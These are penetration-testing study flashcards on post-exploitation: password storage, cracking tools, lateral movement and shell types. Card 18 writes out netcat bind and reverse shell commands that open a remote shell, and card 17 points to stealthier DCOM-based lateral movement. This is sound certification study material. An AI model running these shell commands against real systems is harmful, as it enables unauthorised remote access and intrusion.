Lesson 16 - Leveraging the Attack Flashcards

1
Q

What is the term for a file containing data captures from system memory

A

Dump File

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

What is the random generated string that can be added to the password before hashing

A

Salt

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

What is the Brute Force attack in which multiple user accounts are tests with a dictionary common passwords

A

Password Spraying

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Where were LInux passwords originally stored and where are the currently and why

A

/etc/passwd

/etc/shadow - uses a hashing algorithm based on distribution

Most recently SHA-256 or SHA-512

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

Where does Windows stored local usernames and passwords

A

Security Account Manager (SAM)

Passwords are stored in two types -

LanMan (LM) Hash.
NT Hash - simple MD4

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

What is LSASS in Windows

A

Windows Local Security Authority - LSA Secrets stores password details

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

What is the password cracking tools that gathers credentials by extracting key elements from memory

A

Mimikatz

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

Modern password and hash cracking tool that can speed up the process by using different attack methods (dictionary, brute, mask)

A

Hashcat

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

Parallel brute-forcer for network logins, Focus to support numerous network services that allow remote authentication

A

Medusa

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

Tool that allows to interpret results from Nmap scan to automatically start Medusa agains open port

A

Brutespray

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

Similar to Medusa but support parallel testing of several networks authentication. Bundled with pw-inspect

A

Hydra

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

Highly optimized password cracker and can identify a large set of hashes with its community edition - mult platforms

A

John the Ripper

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

URL Brute Forcer that comes bundled with different word lists geared towards web applications and site directories

A

DirBuster

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

Does Burpsuite has a password cracker

A

Yes. -has a module for that

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

What tools can I use for post-exploitation in a network that uses Windows AD

A

Responder.py
BloodhoundAD

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

Name some methods of LoTL to perform lateral movements

A

PsExec, WMI, Login using Telnet or SSH

Note - these can stand out to administrator

17
Q

What are other methods for lateral movement that will not bring as much attention to the tester or hacker

A

Using RPC for inter-process communication between local and remote process on Windows. then utilized Distributed Component Object Model (DCOM) to enable communications of software components

DCOM apps use RPC as a transport mechanism for client requests

MMC2.0Application includes an ExecuteShellCommand()

18
Q

What are the two types of shell attacks

A

Bind Shell - target system binds it shell to a local port and an attacker’s shell communicates

NetCat is the most common tool
nc -lp 12345 -e /bin/sh

Reverse Shell - a malicious remote command shell where the victim host opens the connection to attacking hosts

nc -lp 12345 from host
Target
nc 192…. 12345 -e /bin/sh

Reverse shells are more effective since they are outbound and not as impacted from a firewall rule

19
Q

What is the type of password attack that creates variants and combinations of word lists in an attempt to crack a password

A

Rule Attack

20
Q

What is the parameter of NC which allows multiple subsequent connections to Windows bind shell

A

-L

21
Q

What common meterpreter command is not present in the PHP Variant

A

getsystem

22
Q
A